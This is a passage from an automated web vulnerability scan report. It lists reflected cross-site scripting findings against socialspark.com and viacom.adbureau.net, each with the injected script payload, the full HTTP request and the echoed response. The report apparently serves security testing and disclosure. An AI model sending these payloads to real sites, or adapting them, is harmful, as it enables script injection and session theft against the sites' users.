Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:46:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:46:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-content/uploads/2010/05/izea_on_twitter.jpg?8f408\"><script>alert(1)</script>ed317dd54f4=1"/>
...[SNIP]...

1.195. http://socialspark.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ca36"><script>alert(1)</script>233ee64e61 was submitted in the REST URL parameter 1. This input was echoed as 8ca36\"><script>alert(1)</script>233ee64e61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes8ca36"><script>alert(1)</script>233ee64e61/js/jquery/jquery.form.js?ver=2.02m HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes8ca36\"><script>alert(1)</script>233ee64e61/js/jquery/jquery.form.js?ver=2.02m"/>
...[SNIP]...

1.196. http://socialspark.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0907"><script>alert(1)</script>a1ce37ea439 was submitted in the REST URL parameter 2. This input was echoed as c0907\"><script>alert(1)</script>a1ce37ea439 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsc0907"><script>alert(1)</script>a1ce37ea439/jquery/jquery.form.js?ver=2.02m HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes/jsc0907\"><script>alert(1)</script>a1ce37ea439/jquery/jquery.form.js?ver=2.02m"/>
...[SNIP]...

1.197. http://socialspark.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34db2"><script>alert(1)</script>543ed7b3b87 was submitted in the REST URL parameter 3. This input was echoed as 34db2\"><script>alert(1)</script>543ed7b3b87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery34db2"><script>alert(1)</script>543ed7b3b87/jquery.form.js?ver=2.02m HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes/js/jquery34db2\"><script>alert(1)</script>543ed7b3b87/jquery.form.js?ver=2.02m"/>
...[SNIP]...

1.198. http://socialspark.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e549"><script>alert(1)</script>d5a4d16e6fc was submitted in the REST URL parameter 4. This input was echoed as 6e549\"><script>alert(1)</script>d5a4d16e6fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.form.js6e549"><script>alert(1)</script>d5a4d16e6fc?ver=2.02m HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes/js/jquery/jquery.form.js6e549\"><script>alert(1)</script>d5a4d16e6fc?ver=2.02m"/>
...[SNIP]...

1.199. http://socialspark.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5bb1"><script>alert(1)</script>cfebda61905 was submitted in the REST URL parameter 1. This input was echoed as a5bb1\"><script>alert(1)</script>cfebda61905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesa5bb1"><script>alert(1)</script>cfebda61905/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includesa5bb1\"><script>alert(1)</script>cfebda61905/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.200. http://socialspark.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4224"><script>alert(1)</script>8894c0c91f3 was submitted in the REST URL parameter 2. This input was echoed as b4224\"><script>alert(1)</script>8894c0c91f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/jsb4224"><script>alert(1)</script>8894c0c91f3/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:47:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:47:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes/jsb4224\"><script>alert(1)</script>8894c0c91f3/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.201. http://socialspark.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3601"><script>alert(1)</script>812c097cb3c was submitted in the REST URL parameter 3. This input was echoed as d3601\"><script>alert(1)</script>812c097cb3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryd3601"><script>alert(1)</script>812c097cb3c/jquery.js?ver=1.4.2 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:48:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:48:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes/js/jqueryd3601\"><script>alert(1)</script>812c097cb3c/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.202. http://socialspark.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ecb"><script>alert(1)</script>ac8601572cb was submitted in the REST URL parameter 4. This input was echoed as f0ecb\"><script>alert(1)</script>ac8601572cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.jsf0ecb"><script>alert(1)</script>ac8601572cb?ver=1.4.2 HTTP/1.1
Host: socialspark.com
Proxy-Connection: keep-alive
Referer: http://socialspark.com/images37b68%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3Eb4a78946341/claimdot.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 13:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 13:49:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/wp-includes/js/jquery/jquery.jsf0ecb\"><script>alert(1)</script>ac8601572cb?ver=1.4.2"/>
...[SNIP]...

1.203. http://socialspark.com/xmlrpc.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://socialspark.com
Path:	/xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94038"><script>alert(1)</script>60d5312ae17 was submitted in the REST URL parameter 1. This input was echoed as 94038\"><script>alert(1)</script>60d5312ae17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php94038"><script>alert(1)</script>60d5312ae17 HTTP/1.1
Host: socialspark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=61366574.1300628473.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; SnapABugVisit=1; __utma=61366574.1144274445.1300628473.1300628473.1300628473.1; SnapABugRef=http%3A%2F%2Fsocialspark.com%2Fimages37b68%2522%253E%253Cscript%253Ealert(%2522DORK%2522)%253C%2Fscript%253Eb4a78946341%2Fclaimdot.gif%20http%3A%2F%2Fburp%2Fshow%2F17; __utmc=61366574; __utmb=61366574.5.10.1300628473; sifrFetch=true; SnapABugHistory=1#;

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 14:01:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://socialspark.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 20 Mar 2011 14:01:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<meta property="og:url" content="http://socialspark.com/xmlrpc.php94038\"><script>alert(1)</script>60d5312ae17"/>
...[SNIP]...

1.204. http://viacom.adbureau.net/AFTRSERVER/hserver//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/AFTRSERVER/hserver//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ade90'%3balert(1)//5fdc1214f1c was submitted in the REST URL parameter 2. This input was echoed as ade90';alert(1)//5fdc1214f1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AFTRSERVER/hserverade90'%3balert(1)//5fdc1214f1c//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE4=+5O4z5sKq+414+4; LE0=+5O4z5sqcF+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 12:34:31 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2322
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1297806090-11017856; expires=Wed, 23 Mar 2011 12:34:31 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload5232,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000ade90';alert(1)//5fdc1214f1c//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5232
...[SNIP]...

1.205. http://viacom.adbureau.net/AFTRSERVER/hserver//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/AFTRSERVER/hserver//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ded0'%3balert(1)//c52e099cc97 was submitted in the REST URL parameter 3. This input was echoed as 9ded0';alert(1)//c52e099cc97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AFTRSERVER/hserver//height9ded0'%3balert(1)//c52e099cc97=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE4=+5O4z5sKq+414+4; LE0=+5O4z5sqcF+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 12:34:32 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2322
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: AA002=1297806090-11017856; expires=Wed, 23 Mar 2011 12:34:32 GMT; path=/; domain=viacom.adbureau.net
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload5232,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000//height9ded0';alert(1)//c52e099cc97=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1//ATCI=1297806090-11017856/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5232';

...[SNIP]...

1.206. http://viacom.adbureau.net/hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89644'%3balert(1)//b10f9dcaa9c was submitted in the REST URL parameter 1. This input was echoed as 89644';alert(1)//b10f9dcaa9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver89644'%3balert(1)//b10f9dcaa9c/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE0=+5O4z5sqcF+314+4; LE4=+5O4z5sKq+414+8WHqNOJQ.+3Cm+4; AA002=1297806090-11017856

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 13:07:50 GMT
X-DirectServer: viacom_DS15
Content-Type: text/html
Content-Length: 2295
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>

<script type="text/javascript">

var payload5232,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=00001470000000000000000089644';alert(1)//b10f9dcaa9c/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5232';

/* Try to get
...[SNIP]...

1.207. http://viacom.adbureau.net/hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://viacom.adbureau.net
Path:	/hserver/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8664'%3balert(1)//206b76984df was submitted in the REST URL parameter 2. This input was echoed as b8664';alert(1)//206b76984df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/heightb8664'%3balert(1)//206b76984df=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004818DF4480D8569BB5B6461626364; LE0=+5O4z5sqcF+314+4; LE4=+5O4z5sKq+414+8WHqNOJQ.+3Cm+4; AA002=1297806090-11017856

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Sun, 20 Mar 2011 13:07:51 GMT
X-DirectServer: viacom_DS19
Content-Type: text/html
Content-Length: 2295
Pragma: no-cache
